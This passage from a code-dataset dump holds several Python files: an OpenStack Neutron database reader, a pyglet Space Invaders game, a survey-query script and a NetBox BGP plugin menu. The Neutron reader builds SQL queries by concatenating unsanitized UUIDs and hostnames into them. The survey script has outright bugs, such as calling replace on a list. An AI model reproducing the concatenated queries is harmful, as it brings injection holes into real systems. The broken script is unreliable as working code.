\"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['subnet_id'] = sub_row[0]\n return res\n\n def get_ports_by_instance_uuid(self, instance_uuid):\n \"\"\"\n Return list of Neutron ports of the given nova instance.\n :param instance_uuid: UUID of the Nova Instance\n :return list: contains ports UUID\n \"\"\"\n res = []\n cur = self.conn.cursor()\n query = 'SELECT id FROM ports WHERE device_id = \"' + instance_uuid + '\"'\n cur.execute(query)\n for row in 
cur.fetchall():\n res.append(row[0])\n return res\n\n def get_ports(self, uuid=None):\n \"\"\"\n Return a dict containing the ports stored in Neutron.\n If an UUID is given, it will return only the port with the given UUID\n :param uuid: Optional UUID of the desired port\n :return dict: contains ports information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from ports where device_owner != \"network:floatingip\"'\n if uuid:\n query += ' and id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n if row[2] != '':\n res[row[1]]['name'] = row[2]\n\n res[row[1]]['type'] = 'port'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['mac_address'] = row[4]\n res[row[1]]['attributes']['admin_state_up'] = row[5]\n res[row[1]]['attributes']['status'] = row[6]\n res[row[1]]['attributes']['device_id'] = row[7]\n\n if row[8] != '':\n res[row[1]]['attributes']['device_owner'] = row[8]\n\n query = 'select * from ml2_port_bindings'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n if row[1] != '':\n res[row[0]]['hostname'] = row[1]\n res[row[0]]['attributes']['vif_type'] = row[2]\n res[row[0]]['attributes']['driver'] = row[3]\n res[row[0]]['attributes']['segment'] = row[4]\n res[row[0]]['attributes']['vnic_type'] = row[5]\n\n if row[6] != '':\n res[row[0]]['attributes']['vif_details'] = json.loads(row[6])\n if row[7] != '':\n res[row[0]]['attributes']['profile'] = row[7]\n\n query = 'select * from ipallocations'\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n res[row[0]]['attributes']['ip_address'] = row[1]\n res[row[0]]['attributes']['subnet_id'] = row[2]\n\n for port in res.keys():\n if res[port]['attributes']['vif_type'] != 'unbound':\n host = res[port]['hostname']\n if res[port]['attributes']['driver'] in MAP_DRIVER_BINARY.keys():\n driver = res[port]['attributes']['driver']\n query = 'select id from agents where agents.host=\"' + host + \\\n '\" and agents.binary=\"' + MAP_DRIVER_BINARY[driver] + '\" LIMIT 1;'\n cur.execute(query)\n for row in cur.fetchall():\n res[port]['attributes']['agent_id'] = row[0]\n\n query = 'select * from floatingips'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[5] in res.keys():\n if 'floatingips' not in res[row[5]]['attributes'].keys():\n res[row[5]]['attributes']['floatingips'] = []\n res[row[5]]['attributes']['floatingips'].append(row[1])\n\n return res\n\n def get_agents(self, uuid=None):\n \"\"\"\n Return a dict containing the Neutron agents stored in Neutron.\n If an UUID is given, it will return only the agent with the given UUID\n :param uuid: Optional UUID of the desired agent\n :return dict: contains agents information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from agents'\n\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'service'\n res[row[0]]['name'] = row[1]\n res[row[0]]['hostname'] = row[4]\n res[row[0]]['category'] = 'network'\n res[row[0]]['type'] = row[2]\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['admin_state_up'] = row[5]\n res[row[0]]['attributes']['configurations'] = json.loads(row[10])\n return res\n\n def get_networks(self, uuid=None):\n \"\"\"\n Return a dict containing the 
networks stored in Neutron.\n If an UUID is given, it will return only the network with the given UUID\n :param uuid: Optional UUID of the desired network\n :return dict: contains networks information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select n.id, n.name, n.status, n.admin_state_up, n.shared from networks n'\n\n if uuid:\n query += ' where n.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'virtual'\n res[row[0]]['name'] = row[1]\n res[row[0]]['type'] = 'net'\n res[row[0]]['category'] = 'network'\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['status'] = row[2]\n res[row[0]]['attributes']['admin_state_up'] = row[3]\n res[row[0]]['attributes']['shared'] = row[4]\n subnets = self.get_subnets_by_net_id(row[0])\n if subnets and len(subnets) > 0:\n res[row[0]]['attributes']['subnets'] = subnets\n\n query = 'select m.network_id, m.network_type, m.physical_network, ' \\\n 'm.segmentation_id, m.is_dynamic from ml2_network_segments m'\n\n if uuid:\n query += ' where m.network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['network_type'] = row[1]\n res[row[0]]['attributes']['physical_network'] = row[2]\n res[row[0]]['attributes']['segmentation_id'] = row[3]\n res[row[0]]['attributes']['is_dynamic'] = row[4]\n\n query = 'select network_id, dhcp_agent_id from networkdhcpagentbindings'\n\n if uuid:\n query += ' where network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['dhcp_agent_id'] = row[1]\n\n return res\n\n def get_subnets_by_net_id(self, net_id):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron for a given Network.\n\n :param net_id: UUID of the desired Network\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets where network_id = \"' + net_id + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['name'] = row[2]\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n\n def get_subnets(self, uuid=None):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron.\n If an UUID is given, it will return only the subnet with the given UUID\n :param uuid: Optional UUID of the desired subnet\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets'\n\n if uuid:\n query += ' where id = \"' + uuid + 
'\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'subnet'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n","repo_name":"IntelLabsEurope/infrastructure-repository","sub_path":"monitoring_service/epa_database/openstack/neutron_db.py","file_name":"neutron_db.py","file_ext":"py","file_size_in_byte":15327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"70831511773","text":"import random\n\nimport pyglet\nfrom pyglet.window import key\n\nclass _Shield(object):\n def __init__(self, x, y):\n self.x, self.y = x, y\n self.sprites = [\n None,\n pyglet.resource.image('shield_damlo.png'),\n pyglet.resource.image('shield_damhi.png'),\n pyglet.resource.image('shield_full.png'),\n pyglet.resource.image('shield_nw.png'),\n pyglet.resource.image('shield_ne.png'),\n ]\n self.states = [\n [0, 4, 3, 3, 3, 3, 5, 0],\n [4, 3, 3, 3, 3, 3, 3, 5],\n [3, 3, 0, 0, 0, 0, 3, 3],\n [3, 3, 0, 0, 0, 0, 3, 3],\n ]\n self.IW = self.sprites[3].width\n self.IH = self.sprites[3].height\n self.RC = range(len(self.states))\n self.CC = range(len(self.states[0]))\n self.width = len(self.states[0]) * self.IW\n def update(self):\n pass\n def paint(self):\n for s_r in self.RC:\n for s_c in self.CC:\n s = self.sprites[self.states[s_r][s_c]]\n x = self.x + s_c * self.IW\n y = self.y - s_r * self.IH\n if s: s.blit(x, y)\n def _reducedState(self, s, fromAbove):\n if s in [1, 2]:\n return 0\n elif s in [3, 4, 5]:\n return {True:1,False:2}[fromAbove]\n else:\n assert False\n def top(self):\n return self.y + self.IH\n def absorb(self, xl, yl, xh, yh, fromAbove):\n x = (xl + xh) / 2\n for r in self.RC:\n ry = self.y - r * self.IH\n if yl >= ry + self.IH: continue\n if yh < ry: continue\n for c in self.CC:\n cx = self.x + c * self.IW\n if not self.states[r][c]: continue\n if x < cx: continue\n if x >= cx + self.IW: continue\n s = self.states[r][c]\n self.states[r][c] = self._reducedState(s, fromAbove)\n return True\n def height(self):\n return self.IH * len(self.RC)\n def bitHeight(self):\n return self.IH\n def melt(self, invaderInvasionY):\n anythingMelted = False\n row = invaderInvasionY // self.IH\n if row < 0:\n return anythingMelted\n if row > len(self.states):\n row = len(self.states)\n for i_r in xrange(row):\n for i_c in self.CC:\n s = self.states[i_r][i_c]\n if s:\n anythingMelted = True\n self.states[i_r][i_c] = self._reducedState(s, True)\n return anythingMelted\n \nclass Shields(object):\n def __init__(self, window):\n sw = _Shield(0, 0).width\n pad = 128\n num = 4\n y = 96\n i_pad = (window.width - 2 * pad - sw) / (num-1)\n self.subs = [_Shield(pad + i_pad*i_x, y)\n for i_x in range(4)]\n self.top = self.subs[0].top()\n self.nextMelt = self.top\n def melt(self, invaderheight):\n anythingMelted = False\n if invaderheight < self.nextMelt:\n for s in self.subs:\n if s.melt(self.top - invaderheight):\n anythingMelted = True\n if not anythingMelted:\n self.nextMelt -= self.subs[0].bitHeight()\n return anythingMelted\n def absorbFromAbove(self, xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, True)\n def absorbFromBelow(self, xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, False)\n def _absorb(self, xl, yl, xh, yh, fromAbove):\n for s in self.subs:\n if s.absorb(xl, yl, xh, yh, fromAbove):\n return self\n return None\n def update(self):\n pass\n def paint(self):\n for s in self.subs:\n s.paint()\n\nclass Lives(object):\n PAD_OUTER = 3\n PAD_INNER = 1\n def __init__(self, window):\n self.liferepr = pyglet.resource.image('playerlife.png')\n self.count = 2\n self.x = window.width - (self.PAD_OUTER + self.liferepr.width)\n self.y = window.height - (self.PAD_OUTER + self.liferepr.height)\n def paint(self):\n for i in range(self.count):\n x = self.x - i * (self.PAD_INNER + self.liferepr.width)\n self.liferepr.blit(x, self.y)\n def update(self):\n pass\n def upOne(self):\n self.count += 1\n def loseOne(self):\n self.count -= 1\n\nclass Player(object):\n def 
__init__(self, window, keys):\n self.w = window\n self.k = keys\n self.gun = _Gun(window)\n self.s_alive = _AlivePlayer(window, keys, self.gun)\n self.s_dead = _DeadPlayer()\n self.state = self.s_alive\n def isHit(self, xl, yl, xh, yh):\n if self.state != self.s_alive: return None\n if self.s_alive.isHit(xl, yl, xh, yh):\n self.s_dead.init(self.s_alive.x, self.s_alive.y)\n self.state = self.s_dead\n return self\n return None\n def testGunHit(self, hitFuns):\n self.gun.testHit(hitFuns)\n def update(self):\n self.gun.update()\n if self.state == self.s_dead:\n if not self.state.stillDead:\n self.state = self.s_alive\n self.state.resurrect()\n self.state.update()\n def paint(self):\n self.gun.paint()\n self.state.paint()\n\nclass LostPlayer(object):\n def __init__(self, origPlayer):\n if origPlayer.state == origPlayer.s_alive:\n self.state = origPlayer.s_dead\n self.state.init(origPlayer.s_alive.x,\n origPlayer.s_alive.y)\n else:\n self.state = origPlayer.s_dead\n def isHit(self, xl, yl, xh, yh):\n return None\n def testGunHit(self, hitFuns):\n pass\n def update(self):\n self.state.update()\n def paint(self):\n self.state.paint()\n\nclass _DeadPlayer(object):\n ANIMSPEED = 3\n def __init__(self):\n self.anim = [\n pyglet.resource.image('playermelt01.png'),\n pyglet.resource.image('playermelt02.png'),\n pyglet.resource.image('playermelt03.png'),\n pyglet.resource.image('playermelt04.png'),\n ]\n self.a_tick = 0\n self.a_state = None\n self.stillDead = None\n self.x, self.y = 0, 0\n def init(self, x, y):\n self.x = x\n self.y = y\n self.a_state = 0\n self.stillDead = 30\n self.a_tick = self.ANIMSPEED\n def update(self):\n if self.stillDead: self.stillDead -= 1\n if self.a_state == None: return\n self.a_tick -= 1\n if self.a_tick: return\n self.a_tick = self.ANIMSPEED\n self.a_state += 1\n if self.a_state >= len(self.anim):\n self.a_state = None\n return\n def paint(self):\n if self.a_state == None: return\n self.anim[self.a_state].blit(self.x, self.y)\n \nclass _AlivePlayer(object):\n def __init__(self, window, keys, gun):\n self.w = window\n self.gun = gun\n self.s = pyglet.resource.image('player.png')\n self.x, self.y = self.w.width/2, 4\n self.keys = keys\n self.invulnerable = 0\n def resurrect(self):\n self.invulnerable = 50\n def update(self):\n if self.invulnerable:\n self.invulnerable -= 1\n vx = 0\n if self.keys[key.LEFT]: vx -= 10\n if self.keys[key.RIGHT]: vx += 10\n self.x += vx\n self.x = max(self.x, 0)\n self.x = min(self.x, self.w.width - self.s.width)\n if self.keys[key.SPACE]: self._pewpew()\n def isHit(self, xl, yl, xh, yh):\n if self.invulnerable: return False\n sxh = self.x+self.s.width\n syh = self.y+self.s.height\n if yl > syh: return False\n if yh < self.y: return False\n if xl > sxh: return False\n if xh < self.x: return False\n return True\n def paint(self):\n if self.invulnerable:\n if (self.invulnerable/5)%2:\n return\n self.s.blit(self.x, self.y)\n def _pewpew(self):\n self.gun.fire(self.x + (self.s.width/2), self.y + self.s.height)\n\nclass _Gun(object):\n COOLDOWN_MAX = 5\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('pewpew.png')\n self.cx, self.cy = self.s.width/2, 0\n self.x, self.y = 0, 0\n self.firing = False\n self.cooldown = 0\n def fire(self, x, y):\n if self.firing: return\n if self.cooldown: return\n self.x = x - self.cx\n self.y = y - self.cy\n self.firing = True\n self.cooldown = self.COOLDOWN_MAX\n def update(self):\n if self.cooldown: self.cooldown -= 1\n if not self.firing: return\n self.y += 15\n if self.y > 
self.w.height:\n self.firing = False\n return\n def testHit(self, hitFun):\n if not self.firing: return\n if hitFun(self.x, self.y, self.x+self.s.width, self.y+self.s.height):\n self.firing = False\n def paint(self):\n if not self.firing: return\n self.s.blit(self.x, self.y)\n\nclass _InvaderExplode(object):\n def __init__(self):\n s = [pyglet.resource.image('invaderexplode0.png'),\n pyglet.resource.image('invaderexplode1.png')]\n self.x, self.y = 0, 0\n self.sm = {'inactive': {'d': 0, 'next': None, 's': None},\n 'explode0': {'d': 5, 'next': 'explode1', 's': s[0]},\n 'explode1': {'d': 10, 'next': 'inactive', 's': s[1]}}\n self.st = 'inactive'\n self.st_c = 0\n def trans(self, state):\n self.st = state\n self.st_c = self.sm[state]['d']\n def boom(self, x, y):\n self.x, self.y = x, y\n self.trans('explode0')\n def paint(self):\n s = self.sm[self.st]['s']\n if not s: return\n s.blit(self.x, self.y)\n def update(self):\n if not self.st_c: return\n self.st_c -= 1\n if self.st_c: return\n self.trans(self.sm[self.st]['next'])\n\nclass _InvaderZap(object):\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('zapzap.png')\n self.cx, self.cy = self.s.width/2, 0\n self.xyl = []\n self.wh = (self.s.width, self.s.height)\n def fire(self, x, y):\n self.xyl.append([x - self.cx, y - self.cy])\n def update(self):\n for p in self.xyl: p[1] -= 10\n self.xyl = [p for p in self.xyl if p[1] > -self.s.height]\n def testHit(self, hitFuns):\n hitItems = []\n xyl2 = []\n for p in self.xyl:\n bounds = p[0], p[1], p[0]+self.s.width, p[1]+self.s.height\n hit = reduce(lambda a, f: a or f(*bounds), hitFuns, None)\n if hit:\n hitItems.append(hit)\n continue # shot absorbed\n xyl2.append(p)\n self.xyl = xyl2\n return hitItems\n def paint(self):\n for [x, y] in self.xyl:\n self.s.blit(x, y)\n\nclass Invaders(object):\n def __init__(self, window, diffLevel):\n self.w = window\n self.diffLevel = diffLevel\n self.ROWS = 6\n self.COLS = 8\n self.explode = _InvaderExplode()\n self.zap = _InvaderZap(window)\n self.invader0 = [\n pyglet.resource.image('invader01.png'),\n pyglet.resource.image('invader02.png')]\n self.iw, self.ih = self.invader0[0].width, self.invader0[0].height\n self.pad = 16\n self.x = 2 * self.pad\n self.y = self.w.height - (self.ih + 2 * self.pad)\n self.il = [[True]*self.COLS for _ in [None]*self.ROWS]\n self.bipbop = 0\n self.bipcnt = 0\n self.zapcnt = 100\n self.vx = self.iw/4\n self.vy = -(self.ih + self.pad)\n self.calcWidth()\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.moving = True\n\n def reachedBottom(self):\n return self.bottomBoundary <= 0\n\n def calcBottomBoundary(self):\n bott = -1\n for i_r in xrange(len(self.il)):\n if max(self.il[i_r]):\n bott = i_r\n _, y = self.pos(bott, 0)\n return y\n \n def calcSpeed(self):\n def getDiffCurve():\n if self.diffLevel > 12:\n return [1, 2, 3, 4, 5, 6, 7]\n if self.diffLevel > 8:\n return [1, 2, 4, 5, 6, 8, 10]\n if self.diffLevel > 6:\n return [2, 4, 5, 6, 8, 10, 13]\n if self.diffLevel > 4:\n return [3, 5, 6, 8, 10, 13, 16]\n if self.diffLevel > 1:\n return [4, 6, 8, 10, 13, 16, 18]\n else:\n return [5, 7, 10, 13, 16, 18, 20]\n speeds = getDiffCurve()\n n = 0\n for r in xrange(self.ROWS):\n for c in xrange(self.COLS):\n if self.il[r][c]:\n n += 1\n if n < 2:\n return speeds[0]\n if n < 5:\n return speeds[1]\n if n < 10:\n return speeds[2]\n if n < 20:\n return speeds[3]\n if n < 30:\n return speeds[4]\n if n < 40:\n return speeds[5]\n else:\n return speeds[6]\n\n def collide(self, 
xl, yl, xh, yh):\n for i_r in xrange(self.ROWS):\n i_yl = self.y - (self.ih + self.pad) * i_r\n i_yh = i_yl + self.ih\n if yh < i_yl: continue\n if yl > i_yh: continue\n for i_c in xrange(self.COLS):\n i_xl = self. x + (self.iw + self.pad) * i_c\n i_xh = i_xl + self.iw\n if xh < i_xl: continue\n if xl > i_xh: continue\n if self.il[i_r][i_c]:\n self.il[i_r][i_c] = False\n self.explode.boom(i_xl, i_yl)\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.reduceSizeIfNeeded()\n return True\n return False\n\n def allDead(self):\n return not self.COLS\n\n def removeZaps(self):\n self.zap = _InvaderZap(self.w)\n\n def reduceSizeIfNeeded(self):\n for i_c in [0, -1]:\n if not self.COLS: return\n if not sum([self.il[i_r][i_c]\n for i_r in range(self.ROWS)]):\n self.stripCol(i_c)\n self.reduceSizeIfNeeded()\n\n def stripCol(self, i_c):\n self.COLS -= 1\n for r in self.il:\n r.pop(i_c)\n if i_c == 0:\n self.x += self.iw + self.pad\n self.calcWidth()\n\n def calcWidth(self):\n self.totWidth = len(self.il[0]) * (self.iw + self.pad) - self.pad\n\n def getBottomOfRandomRow(self):\n candidates = []\n for i_c in xrange(self.COLS):\n for i_r in xrange(self.ROWS-1, -1, -1):\n if self.il[i_r][i_c]:\n candidates.append((i_r, i_c))\n break\n if not candidates:\n return None, None\n r, c = random.choice(candidates)\n x, y = self.pos(r, c)\n x += self.invader0[0].width / 2\n return x, y\n\n def update(self):\n self.explode.update()\n self.zap.update()\n self.bipcnt = (self.bipcnt + 1)%self.speed\n if self.bipcnt == 0:\n self.bipbop = (self.bipbop + 1)%2\n if self.moving:\n self.x += self.vx\n if (self.x + self.totWidth > self.w.width) or (self.x < 0):\n self.vx *= -1\n self.x += self.vx\n self.y += self.vy\n self.bottomBoundary = self.calcBottomBoundary()\n self.zapcnt -= 1\n if self.zapcnt == 0:\n self.zapcnt = random.randrange(10, 120)\n x, y = self.getBottomOfRandomRow()\n if x != None:\n self.zap.fire(x, y)\n\n def pos(self, r, c):\n return (self.x + c*(self.iw + self.pad),\n self.y - r*(self.ih + self.pad))\n\n def paint(self):\n def paintOne(row, col):\n x, y = self.pos(row, col)\n s = self.invader0[self.bipbop]\n s.blit(x, y)\n self.explode.paint()\n self.zap.paint()\n for ir in xrange(len(self.il)):\n row = self.il[ir]\n for ic in xrange(len(row)):\n row[ic] and paintOne(ir, ic)\n\nGAMEOVER_LABEL = pyglet.text.Label(\n 'GAME OVER',\n font_name=\"sans\",\n font_size=24,\n x=0, # set later\n y=0, # set later\n anchor_x=\"center\",\n anchor_y=\"center\") \nclass GameOver(object):\n def __init__(self, window):\n self.lbl = GAMEOVER_LABEL\n self.lbl.x = window.width//2\n self.lbl.y = window.height//2\n def update(self):\n pass\n def paint(self):\n self.lbl.draw()\n\nclass Level(object):\n def __init__(self, window):\n self.window = window\n self.value = 1\n self.lbl = self.mkLbl()\n self.fullYayWait = 60\n self.done = False\n def mkLbl(self):\n color = (255, 255, 255, 255)\n shinies = '%s'\n if self.value >= 2:\n shinies = shinies%'-%s-'\n if self.value >= 4:\n shinies = shinies%'=%s='\n if self.value >= 6:\n shinies = shinies%'<%s>'\n if self.value >= 8:\n shinies = shinies%'*%s*'\n if self.value >= 10:\n shinies = shinies%'>%s<'\n if self.value >= 12:\n shinies = shinies%'{%s}'\n if self.value >= 14:\n shinies = shinies%'~%s~'\n if self.value >= 16:\n shinies = shinies%'_%s_'\n if self.value >= 18:\n shinies = shinies%'/%s\\\\'\n if self.value >= 20:\n shinies = shinies%' %s '\n color = (238, 201, 0, 255) # gold!\n return pyglet.text.Label(\n shinies%('LEVEL 
%d'%self.value),\n font_name=\"sans\",\n font_size=15,\n x=self.window.width // 2,\n y=self.window.height,\n anchor_x=\"center\",\n anchor_y=\"top\",\n color=color)\n def up(self):\n self.value += 1\n self.lbl = self.mkLbl()\n def update(self):\n pass\n def paint(self):\n self.lbl.draw()\n\ndef _mkYayLbl(level):\n return pyglet.text.Label(\n 'YOU BEAT LEVEL %d'%level,\n font_name=\"sans\",\n font_size=50,\n x=0, # window.width // 2 later\n y=0, # window.height // 2 later\n anchor_x=\"center\",\n anchor_y=\"center\")\n_YAY_LABELS = [_mkYayLbl(n) for n in xrange(20)]\nclass YayYou(object):\n def __init__(self, window, level):\n global _YAY_LABELS\n while level >= len(_YAY_LABELS):\n _YAY_LABELS.extend([_mkYayLbl(n) for n in xrange(len(_YAY_LABELS), len(_YAY_LABELS)+10)])\n self.lbl = _YAY_LABELS[level]\n self.lbl.x = window.width // 2\n self.lbl.y = window.height // 2\n self.countdown = 60\n self.halfcountdown = self.countdown // 2\n self.done = False\n self.halfDone = False\n def update(self):\n if self.countdown:\n self.countdown -= 1\n self.halfDone = self.countdown > self.halfcountdown\n self.done = not self.countdown\n def paint(self):\n self.lbl.draw()\n","repo_name":"deestan/invade","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"40295778448","text":"import psycopg2\n# from theapp import app\n# import viz\n# from flask import render_template, request\n#import pandas as pd #We don't have pandas yet.\n#We need to get some input things\n\n\n#y_n = request.args.get('all_or_none', default = None, type = str)\n#qst = request.args.get('question' , default = None, type = str)\n# subset by dropdown\ny_n = 'yes'\nqst = \"Who/what are your favorite media sources that report on data science topics?\"\n\nquestion_to_column = {\"Which of the following relational database products do you use on a regular basis?\": 'q34',\n 'Which of the following cloud computing platforms do you use on a regular basis?' : 'q29',\n \"Which of the following natural language processing (NLP) methods do you use on a regular basis?\": 'q27',\n 'Which categories of computer vision methods do you use on a regular basis?': 'q26',\n 'Which categories of ML tools do you use on a regular basis?' : 'q25' ,\n 'Which of the following ML algorithms do you use on a regular basis?': 'q24',\n 'What programming languages do you use on a regular basis?': 'q18',\n \"Which of the following integrated development environments (IDE's) do you use on a regular basis?\": 'q16',\n \"What is the primary tool that you use at work or school to analyze data?\": 'q14',\n \"On which platforms have you begun or completed data science courses?\" : 'q13',\n \"Who/what are your favorite media sources that report on data science topics?\": 'q12',\n \"Select any activities that make up an important part of your role at work\": 'q9'}\n\nother_questions = ['q9', 'q12', 'q14', 'q15', 'q16', 'q18', 'q24', 'q25', 'q26', 'q27', \"q29\", 'q34']\n\n# q14 is all free response so all or none are equivalent.\n\nquestion_size = {'q34': 12,\n 'q29': 12,\n 'q27': 6,\n 'q26': 7,\n 'q25': 8,\n 'q24': 12,\n 'q18': 12,\n 'q16': 12,\n 'q14': 5,\n 'q13': 12,\n 'q12': 12,\n 'q9': 8 }\n\n# Initialization code to be able to query the database\nconn = psycopg2.connect(\"dbname=kaggle user=abucklin\")\ncur = conn.cursor()\n\ndef query_generator_and_data_grabber(question = qst, yes_or_no = y_n):\n qnum = question_to_column[qst]\n columns = []\n for i in range(1, question_size[qnum]+1):\n string = qnum + \"_\" + str(i)\n columns.append(string)\n\n columns = columns.replace( \"]\" , \"'\").replace(\"[\", '').replace(\"'\", '')\n\n basic = \"SELECT \" + columns + \" FROM mcq \"\n conditions = ''\n query = basic + conditions + \";\"\n cur.execute(query)\n data = cur.fetchall()\n\n if \"y\" in yes_or_no :\n second = \"SELECT \" + str(qnum) + \"FROM other_questions\"\n cur.execute(second + \";\")\n x = cur.fetchall()\n data = data.extend(x)\n return data\n\n\nraw_data = query_generator_and_data_grabber()\n\n#data = pd.DataFrame(raw_data, columns = [in_ss , in_pp]) #Still don't have pandas.\n","repo_name":"mandab749/State_of_Data_Science","sub_path":"Word_Cloud_queries.py","file_name":"Word_Cloud_queries.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70831663130","text":"from django.conf import settings\n\nfrom extras.plugins import PluginMenuButton, PluginMenuItem, PluginMenu\nfrom utilities.choices import ButtonColorChoices\n\n\n_menu_items = (\n PluginMenuItem(\n link='plugins:netbox_bgp:community_list',\n link_text='Communities',\n permissions=['netbox_bgp.view_community'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:community_add',\n title='Communities',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_community'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgpsession_list',\n link_text='Sessions',\n permissions=['netbox_bgp.view_bgpsession'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgpsession_add',\n title='Sessions',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgpsession'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:routingpolicy_list',\n link_text='Routing Policies',\n permissions=['netbox_bgp.view_routingpolicy'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:routingpolicy_add',\n title='Routing Policies',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_routingpolicy'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:prefixlist_list',\n link_text='Prefix Lists',\n permissions=['netbox_bgp.view_prefixlist'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:prefixlist_add',\n title='Prefix Lists',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_prefixlist'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgppeergroup_list',\n link_text='Peer Groups',\n permissions=['netbox_bgp.view_bgppeergroup'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgppeergroup_add',\n title='Peer Groups',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgppeergroup'],\n ),\n ),\n )\n)\n\nplugin_settings = settings.PLUGINS_CONFIG.get('netbox_bgp', {})\n\nif plugin_settings.get('top_level_menu'):\n menu = PluginMenu( \n label=\"BGP\",\n groups=((\"BGP\", _menu_items),),\n icon_class=\"mdi mdi-bootstrap\",\n )\nelse:\n menu_items = 